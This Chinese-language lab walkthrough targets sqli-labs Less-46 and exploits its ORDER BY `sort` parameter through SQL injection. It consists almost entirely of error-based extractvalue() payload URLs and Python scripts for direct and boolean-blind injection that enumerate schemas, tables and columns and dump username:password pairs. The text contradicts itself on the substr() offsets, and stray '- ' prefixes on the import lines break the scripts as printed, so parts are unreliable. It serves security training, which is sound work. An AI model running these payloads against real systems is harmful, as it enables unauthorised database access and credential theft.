目录
报错注入
直接注入
数据库名
数据库中的表名
users表结构:
users表数据:
python脚本注入
直接注入
获取数据库名
获取表名
获取表结构
获取数据
布尔盲注
获取数据库名
获取表名
获取表结构
获取数据
报错注入
直接注入
数据库名
当前数据库名:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select database() limit 0,1))))
系统数据库名:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata))))
长度限制:extractvalue() 的 XPATH 报错信息最多只回显 32 个字符(含开头的 ~),超长结果需用截取函数 substr() 分段读取。注意 substr() 的第三个参数是长度而不是结束位置:第一段取 substr(...,1,32),下一段应从第 33 位开始(substr(...,33,32)),否则第 32 位会被重复取出:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),1,32))))
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),32,64))))
数据库中的表名
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'))))
同理利用截取函数substr():
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'),32,64))))
users表结构:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),1,32))))
users表数据:
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),1,32))))
http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),32,64))))
python脚本注入
直接注入
获取数据库名
- import requests
- import re
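target_url = "http://sqli-labs:8013/Less-46/"  # `sort` is the injectable parameter


def extract_database_names(session=None) -> list[str]:
    """Enumerate schema names through error-based injection (extractvalue).

    One request per schema: the ``limit {index},1`` subquery selects the
    index-th row of information_schema.schemata and extractvalue() echoes it
    back inside MySQL's "XPATH syntax error" message.  Enumeration stops at
    the first index that leaks nothing (end of the result set) or on a
    request error.

    Caveat: MySQL truncates the XPATH error text to 32 characters, so the
    captured value (after the leading ``~``) is cut at 31 characters; split
    longer values with substr() as in the manual payloads.

    Args:
        session: requests-style object exposing ``get(url, params=, timeout=)``
            (e.g. a ``requests.Session`` configured with a proxy or cookies).
            Defaults to the ``requests`` module.

    Returns:
        Schema names leaked so far; partial if a request failed midway.
    """
    http = requests if session is None else session
    # Leaked text sits between the "~" marker and the error's closing quote.
    leak = re.compile(r"XPATH syntax error: '~([^']+)")
    database_names: list[str] = []
    index = 0
    while True:
        payload = {
            "sort": f"(extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {index},1))))"
        }
        try:
            response = http.get(target_url, params=payload, timeout=10)
            response.raise_for_status()
        except requests.exceptions.RequestException as e:
            # Stop instead of retrying the same index forever: the original
            # swallowed the error without advancing or breaking.
            print(f"[-] 请求错误,索引为 {index}: {e}")
            break
        match = leak.search(response.text)
        if match:
            db_name = match.group(1)
            database_names.append(db_name)
            print(f"成功提取数据库名: {db_name}")
            index += 1
        elif index == 0:
            # Nothing leaked on the very first probe (message wording fixed).
            print("未找到数据库名,可能漏洞不存在或错误信息被隐藏")
            break
        else:
            print("已提取所有数据库名")
            break
    return database_names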
if __name__ == "__main__":
    # Script entry point: enumerate every schema name.  Each name is also
    # printed as it is leaked, so the returned list is only kept for reuse.
    all_database_names = extract_database_names()
获取表名
- import requests
- import re
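target_url = "http://sqli-labs:8013/Less-46/"  # `sort` is the injectable parameter


def extract_table_names(database_name, session=None) -> list[str]:
    """Enumerate table names of one schema through error-based injection.

    One request per table: the ``limit {index},1`` subquery selects the
    index-th row of information_schema.tables for *database_name* and
    extractvalue() echoes it back inside the "XPATH syntax error" message.
    Enumeration stops at the first index that leaks nothing or on a request
    error.

    Caveats: MySQL truncates the XPATH error text to 32 characters, so names
    longer than 31 characters come back cut; *database_name* is interpolated
    inside single quotes as-is, so a name containing ``'`` breaks the query.

    Args:
        database_name: schema whose tables are listed.
        session: requests-style object exposing ``get(url, params=, timeout=)``;
            defaults to the ``requests`` module.

    Returns:
        Table names leaked so far; partial if a request failed midway.
    """
    http = requests if session is None else session
    leak = re.compile(r"XPATH syntax error: '~([^']+)")
    table_names: list[str] = []
    index = 0
    while True:
        payload = {
            "sort": f"(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='{database_name}' limit {index},1))))"
        }
        try:
            response = http.get(target_url, params=payload, timeout=10)
            response.raise_for_status()
        except requests.exceptions.RequestException as e:
            # Break rather than re-probing the same index forever.
            print(f"[-] 请求错误,索引为 {index}: {e}")
            break
        match = leak.search(response.text)
        if match:
            table_name = match.group(1)
            table_names.append(table_name)
            print(f"成功提取表名: {table_name}")
            index += 1
        elif index == 0:
            # Nothing leaked on the very first probe (message wording fixed).
            print("未找到表名,可能漏洞不存在或错误信息被隐藏")
            break
        else:
            print("已提取所有表名")
            break
    return table_names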
if __name__ == "__main__":
    # Target schema: swap in any name returned by the schema-enumeration step.
    all_table_names = extract_table_names("security")
获取表结构
- import requests
- import re
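target_url = "http://sqli-labs:8013/Less-46/"  # `sort` is the injectable parameter


def extract_column_names(database_name, table_name, session=None) -> list[str]:
    """Enumerate the columns of one table through error-based injection.

    One request per column: the ``limit {index},1`` subquery selects the
    index-th row of information_schema.columns for the given schema/table and
    extractvalue() echoes it back inside the "XPATH syntax error" message.
    Enumeration stops at the first index that leaks nothing or on a request
    error.

    Caveats: MySQL truncates the XPATH error text to 32 characters, so names
    longer than 31 characters come back cut; both identifiers are interpolated
    inside single quotes as-is, so a value containing ``'`` breaks the query.

    Args:
        database_name: schema holding *table_name*.
        table_name: table whose columns are listed.
        session: requests-style object exposing ``get(url, params=, timeout=)``;
            defaults to the ``requests`` module.

    Returns:
        Column names leaked so far; partial if a request failed midway.
    """
    http = requests if session is None else session
    leak = re.compile(r"XPATH syntax error: '~([^']+)")
    column_names: list[str] = []
    index = 0
    while True:
        payload = {
            "sort": f"(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{database_name}' limit {index},1))))"
        }
        try:
            response = http.get(target_url, params=payload, timeout=10)
            response.raise_for_status()
        except requests.exceptions.RequestException as e:
            # Break rather than re-probing the same index forever.
            print(f"[-] 请求错误,索引为 {index}: {e}")
            break
        match = leak.search(response.text)
        if match:
            column_name = match.group(1)
            column_names.append(column_name)
            print(f"成功提取列名: {column_name}")
            index += 1
        elif index == 0:
            # Nothing leaked on the very first probe (message wording fixed).
            print("未找到列名,可能漏洞不存在或错误信息被隐藏")
            break
        else:
            print("已提取所有列名")
            break
    return column_names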
if __name__ == "__main__":
    target = ("security", "users")  # (schema, table) to describe
    all_column_names = extract_column_names(*target)
获取数据
- import requests
- import re
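target_url = "http://sqli-labs:8013/Less-46/"  # `sort` is the injectable parameter


def extract_user_data(database_name, table_name, record_id, session=None) -> dict:
    """Leak the username and password of one row via error-based injection.

    Up to two requests are made (one per column), each using
    ``extractvalue(1,concat(0x7e,(select <col> from <table> where id=<id> limit 0,1)))``
    so the value surfaces in the "XPATH syntax error" message.  The password
    is only fetched when the username leaked.

    Args:
        database_name: schema holding *table_name*.  When non-empty it is used
            to schema-qualify the table (``schema.table``); the original
            accepted but ignored it and relied on the connection's current
            database.
        table_name: table to read; must expose ``id``, ``username`` and
            ``password`` columns (hard-coded here).
        record_id: value matched against ``id``.  Interpolated unquoted into
            the SQL, so pass an int.
        session: requests-style object exposing ``get(url, params=, timeout=)``;
            defaults to the ``requests`` module.

    Returns:
        ``{'username': ..., 'password': ...}`` when both values leaked,
        otherwise ``{}``.  An empty or NULL field produces no leak (concat
        yields just ``~`` or NULL), so such a row is indistinguishable from a
        missing id; MySQL also truncates each leaked value to 31 visible
        characters.
    """
    http = requests if session is None else session
    leak = re.compile(r"XPATH syntax error: '~([^']+)")
    table_ref = f"{database_name}.{table_name}" if database_name else table_name

    def probe(column):
        """Return the leaked value of *column* for this id, or None."""
        payload = {
            "sort": f"(extractvalue(1,concat(0x7e,(select {column} from {table_ref} where id={record_id} limit 0,1))))"
        }
        response = http.get(target_url, params=payload, timeout=10)
        response.raise_for_status()
        match = leak.search(response.text)
        return match.group(1) if match else None

    data = {}
    try:
        username = probe("username")
        password = probe("password") if username is not None else None
    except requests.exceptions.RequestException as e:
        print(f"[-] 请求错误,id={record_id}: {e}")
        return data
    if username is not None and password is not None:
        data = {'username': username, 'password': password}
        print(f"{username}:{password}")
    return data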
if __name__ == "__main__":
    database_name = "security"  # target schema
    table_name = "users"        # target table
    record_id = 1               # ids are probed upward from 1
    # The first id that yields no row ends the dump, so a gap in the id
    # sequence stops it early.
    while True:
        print(f"正在提取 id={record_id} 的数据...")
        if not extract_user_data(database_name, table_name, record_id):
            print("没有更多数据,提取结束。")
            break
        record_id += 1
布尔盲注
获取数据库名
- import requests
- from bs4 import BeautifulSoup
- # 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):
    """Return the username shown in the first result row of the page, or "".

    This is the boolean oracle for the blind probes: the selector picks the
    second cell of the first data row of the lab's result table.
    NOTE(review): the selector is tied to this sqli-labs markup and to
    html.parser's tree building — confirm it matches on the real page.

    Args:
        resp: HTML body of the response, as text.
    """
    soup = BeautifulSoup(resp, 'html.parser')
    cells = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')
    return cells[0].text if cells else ""
- # 向目标URL发送请求并返回响应
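def send_request(url, *, timeout=10, session=None):
    """GET *url* and return the response, or None on any requests error.

    A timeout is now always applied: the original call had none, so one
    stalled connection would hang the whole blind-injection loop forever.

    Args:
        url: fully built probe URL (the SQL payload is already in the query
            string; requests percent-encodes it).
        timeout: seconds to wait for connect/read (keyword-only).
        session: requests-style object exposing ``get``; defaults to the
            ``requests`` module.  Pass a ``requests.Session`` to add proxies
            or cookies.

    Returns:
        The response object, or None if the request raised
        ``requests.RequestException`` (the error is printed).
    """
    http = requests if session is None else session
    try:
        return http.get(url, timeout=timeout)
    except requests.RequestException as e:
        print(f"Request error: {e}")
        return None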
- # 获取数据库名
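def get_database_name():
    """Recover database() one character at a time via boolean-blind injection.

    Oracle: ``sort=if(ascii(substr(database(),i,1))>mid,id,username)``.  When
    the comparison is true the rows are ordered by id and the first username
    shown is 'Dumb'; when false they are ordered by username and another row
    comes first.  NOTE(review): this relies on the stock sqli-labs dataset
    (id 1 = 'Dumb', which does not sort first by username) — confirm on any
    other target.

    Each character is found by bisection over the byte range 0..127 (~7
    requests per character).  ``ascii('')`` is 0 past the end of the string,
    so converging on 0 marks the end; starting the range at 0 instead of 32
    means a literal space is no longer mistaken for the terminator.  A failed
    request aborts the search instead of being read as a "false" answer,
    which would silently corrupt the recovered value.

    Returns:
        str: the recovered name (partial if a request failed).
    """
    database_name = ''
    pos = 1
    while True:
        lo, hi = 0, 127
        aborted = False
        while lo < hi:
            mid = (lo + hi) // 2
            url = (
                "http://sqli-labs:8013/Less-46/?sort="
                f"if(ascii(substr(database(),{pos},1))>{mid},id,username) -- "
            )
            resp = send_request(url)
            if resp is None:
                aborted = True
                break
            if get_username(resp.text) == 'Dumb':
                lo = mid + 1  # true branch: char code > mid
            else:
                hi = mid
        if aborted or lo == 0:
            break
        database_name += chr(lo)
        pos += 1
    print(f"Database Name: {database_name}")
    return database_name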
if __name__ == '__main__':
    # Script entry point: recover and print the current database name.
    get_database_name()
获取表名
- import requests
- from bs4 import BeautifulSoup
- # 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):
    """Return the username shown in the first result row of the page, or "".

    This is the boolean oracle for the blind probes: the selector picks the
    second cell of the first data row of the lab's result table.
    NOTE(review): the selector is tied to this sqli-labs markup and to
    html.parser's tree building — confirm it matches on the real page.

    Args:
        resp: HTML body of the response, as text.
    """
    soup = BeautifulSoup(resp, 'html.parser')
    cells = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')
    return cells[0].text if cells else ""
- # 向目标URL发送请求并返回响应
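def send_request(url, *, timeout=10, session=None):
    """GET *url* and return the response, or None on any requests error.

    A timeout is now always applied: the original call had none, so one
    stalled connection would hang the whole blind-injection loop forever.

    Args:
        url: fully built probe URL (the SQL payload is already in the query
            string; requests percent-encodes it).
        timeout: seconds to wait for connect/read (keyword-only).
        session: requests-style object exposing ``get``; defaults to the
            ``requests`` module.  Pass a ``requests.Session`` to add proxies
            or cookies.

    Returns:
        The response object, or None if the request raised
        ``requests.RequestException`` (the error is printed).
    """
    http = requests if session is None else session
    try:
        return http.get(url, timeout=timeout)
    except requests.RequestException as e:
        print(f"Request error: {e}")
        return None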
- # 获取表名
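def get_table_names():
    """Recover the comma-joined table list of the current schema by blind bisection.

    The probed expression is ``group_concat(table_name)`` over
    information_schema.tables for database(), read one character at a time
    with ``sort=if(ascii(substr(<expr>,i,1))>mid,id,username)``: ordering by
    id puts 'Dumb' first (comparison true), ordering by username puts another
    row first (false).  NOTE(review): that oracle is specific to the stock
    sqli-labs data — confirm on any other target.

    Bisection runs over 0..127 (~7 requests per character); ``ascii('')``
    is 0 past the end of the string, so converging on 0 terminates.  A failed
    request aborts the search instead of being read as a "false" answer.
    Caveat: group_concat() output is capped by ``group_concat_max_len``
    (1024 bytes by default), so a schema with many tables is truncated.

    Returns:
        str: the recovered list (partial if a request failed).
    """
    tables = ''
    pos = 1
    while True:
        lo, hi = 0, 127
        aborted = False
        while lo < hi:
            mid = (lo + hi) // 2
            url = (
                "http://sqli-labs:8013/Less-46/?sort="
                "if(ascii(substr((select group_concat(table_name) from "
                f"information_schema.tables where table_schema=database()),{pos},1))>{mid},id,username) -- "
            )
            resp = send_request(url)
            if resp is None:
                aborted = True
                break
            if get_username(resp.text) == 'Dumb':
                lo = mid + 1  # true branch: char code > mid
            else:
                hi = mid
        if aborted or lo == 0:
            break
        tables += chr(lo)
        pos += 1
    print(f"Tables: {tables}")
    return tables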
if __name__ == '__main__':
    # Script entry point: recover and print the table list of the current schema.
    get_table_names()
获取表结构
- import requests
- from bs4 import BeautifulSoup
- # 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):
    """Return the username shown in the first result row of the page, or "".

    This is the boolean oracle for the blind probes: the selector picks the
    second cell of the first data row of the lab's result table.
    NOTE(review): the selector is tied to this sqli-labs markup and to
    html.parser's tree building — confirm it matches on the real page.

    Args:
        resp: HTML body of the response, as text.
    """
    soup = BeautifulSoup(resp, 'html.parser')
    cells = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')
    return cells[0].text if cells else ""
- # 向目标URL发送请求并返回响应
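def send_request(url, *, timeout=10, session=None):
    """GET *url* and return the response, or None on any requests error.

    A timeout is now always applied: the original call had none, so one
    stalled connection would hang the whole blind-injection loop forever.

    Args:
        url: fully built probe URL (the SQL payload is already in the query
            string; requests percent-encodes it).
        timeout: seconds to wait for connect/read (keyword-only).
        session: requests-style object exposing ``get``; defaults to the
            ``requests`` module.  Pass a ``requests.Session`` to add proxies
            or cookies.

    Returns:
        The response object, or None if the request raised
        ``requests.RequestException`` (the error is printed).
    """
    http = requests if session is None else session
    try:
        return http.get(url, timeout=timeout)
    except requests.RequestException as e:
        print(f"Request error: {e}")
        return None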
- # 获取列名
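def get_column_names(table_name='users'):
    """Recover the comma-joined column list of *table_name* by blind bisection.

    The probed expression is ``group_concat(column_name)`` over
    information_schema.columns for database() and *table_name*, read one
    character at a time with
    ``sort=if(ascii(substr(<expr>,i,1))>mid,id,username)``: ordering by id
    puts 'Dumb' first (comparison true), ordering by username puts another
    row first (false).  NOTE(review): that oracle is specific to the stock
    sqli-labs data — confirm on any other target.

    Bisection runs over 0..127 (~7 requests per character); ``ascii('')``
    is 0 past the end of the string, so converging on 0 terminates.  A failed
    request aborts the search instead of being read as a "false" answer.
    Caveat: group_concat() output is capped by ``group_concat_max_len``
    (1024 bytes by default).

    Args:
        table_name: table to describe; interpolated inside single quotes
            as-is (default keeps the original behaviour).

    Returns:
        str: the recovered list (partial if a request failed).
    """
    columns = ''
    pos = 1
    while True:
        lo, hi = 0, 127
        aborted = False
        while lo < hi:
            mid = (lo + hi) // 2
            url = (
                "http://sqli-labs:8013/Less-46/?sort="
                "if(ascii(substr((select group_concat(column_name) from "
                f"information_schema.columns where table_schema=database() and table_name='{table_name}'),{pos},1))>{mid},id,username) -- "
            )
            resp = send_request(url)
            if resp is None:
                aborted = True
                break
            if get_username(resp.text) == 'Dumb':
                lo = mid + 1  # true branch: char code > mid
            else:
                hi = mid
        if aborted or lo == 0:
            break
        columns += chr(lo)
        pos += 1
    print(f"Columns in '{table_name}': {columns}")
    return columns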
if __name__ == '__main__':
    # Script entry point: recover and print the column list of the users table.
    get_column_names()
获取数据
- import requests
- from bs4 import BeautifulSoup
- # 获取页面中的用户名(用于判断SQL注入是否成功)
def get_username(resp):
    """Return the username shown in the first result row of the page, or "".

    This is the boolean oracle for the blind probes: the selector picks the
    second cell of the first data row of the lab's result table.
    NOTE(review): the selector is tied to this sqli-labs markup and to
    html.parser's tree building — confirm it matches on the real page.

    Args:
        resp: HTML body of the response, as text.
    """
    soup = BeautifulSoup(resp, 'html.parser')
    cells = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')
    return cells[0].text if cells else ""
- # 向目标URL发送请求并返回响应
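def send_request(url, *, timeout=10, session=None):
    """GET *url* and return the response, or None on any requests error.

    A timeout is now always applied: the original call had none, so one
    stalled connection would hang the whole blind-injection loop forever.

    Args:
        url: fully built probe URL (the SQL payload is already in the query
            string; requests percent-encodes it).
        timeout: seconds to wait for connect/read (keyword-only).
        session: requests-style object exposing ``get``; defaults to the
            ``requests`` module.  Pass a ``requests.Session`` to add proxies
            or cookies.

    Returns:
        The response object, or None if the request raised
        ``requests.RequestException`` (the error is printed).
    """
    http = requests if session is None else session
    try:
        return http.get(url, timeout=timeout)
    except requests.RequestException as e:
        print(f"Request error: {e}")
        return None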
- # 获取数据(如用户名:密码)
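def get_user_data(table_name='users'):
    """Dump ``username:password`` pairs from *table_name* by blind bisection.

    The probed expression is ``group_concat(username,':',password)`` over the
    whole table, read one character at a time with
    ``sort=if(ascii(substr(<expr>,i,1))>mid,id,username)``: ordering by id
    puts 'Dumb' first (comparison true), ordering by username puts another
    row first (false).  NOTE(review): that oracle is specific to the stock
    sqli-labs data — confirm on any other target.

    Bisection runs over 0..127 (~7 requests per character); ``ascii('')``
    is 0 past the end of the string, so converging on 0 terminates, and a
    space inside a password is no longer mistaken for the end.  A failed
    request aborts the search instead of being read as a "false" answer.
    Caveats: group_concat() output is capped by ``group_concat_max_len``
    (1024 bytes by default), so larger tables are silently truncated, and
    bytes above 127 are not recoverable with this search range.

    Args:
        table_name: table holding ``username`` and ``password`` columns;
            interpolated into the SQL as-is (default keeps the original
            behaviour).

    Returns:
        str: the recovered string (partial if a request failed).
    """
    user_data = ''
    pos = 1
    while True:
        lo, hi = 0, 127
        aborted = False
        while lo < hi:
            mid = (lo + hi) // 2
            url = (
                "http://sqli-labs:8013/Less-46/?sort="
                "if(ascii(substr((select group_concat(username,':',password) "
                f"from {table_name}),{pos},1))>{mid},id,username) -- "
            )
            resp = send_request(url)
            if resp is None:
                aborted = True
                break
            if get_username(resp.text) == 'Dumb':
                lo = mid + 1  # true branch: char code > mid
            else:
                hi = mid
        if aborted or lo == 0:
            break
        user_data += chr(lo)
        pos += 1
    print(f"User Data (username:password): {user_data}")
    return user_data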
if __name__ == '__main__':
    # Script entry point: dump and print all username:password pairs.
    get_user_data()